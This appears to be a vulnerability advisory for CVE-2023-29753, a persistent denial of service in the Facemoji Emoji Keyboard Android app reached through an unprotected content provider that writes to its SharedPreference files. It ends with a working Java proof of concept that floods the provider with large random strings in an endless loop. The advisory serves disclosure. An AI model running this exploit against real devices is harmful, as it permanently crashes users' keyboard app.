Headline
CVE-2023-29753: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows a local attacker to cause a denial of service via the SharedPreference files.
Denial of Service exists in Facemoji Emoji Keyboard(CVE-2023-29753)
Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)
Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)
Version: 2.9.1.2
Download link:https://play.google.com/store/apps/details?id=com.simejikeyboard
Description of the vulnerability for use in the CVE:An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows a local attacker to cause a denial of service via the SharedPreference files.
Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.
poc:
public void attack_keybord(){ ContentResolver contentResolver = getApplicationContext().getContentResolver(); //targetSharedPreferencesName: any sharedpreferences’s name in the app Uri uri = Uri.parse(“content://com.simejikeyboard.dprefrenceprovider/string/targetShardPreferencesName/xxx”); while (true){ ContentValues contentValues = new ContentValues(); String randomString = getRandomString(10240); contentValues.put("key",randomString); contentValues.put("value",randomString); contentResolver.insert(uri,contentValues); } }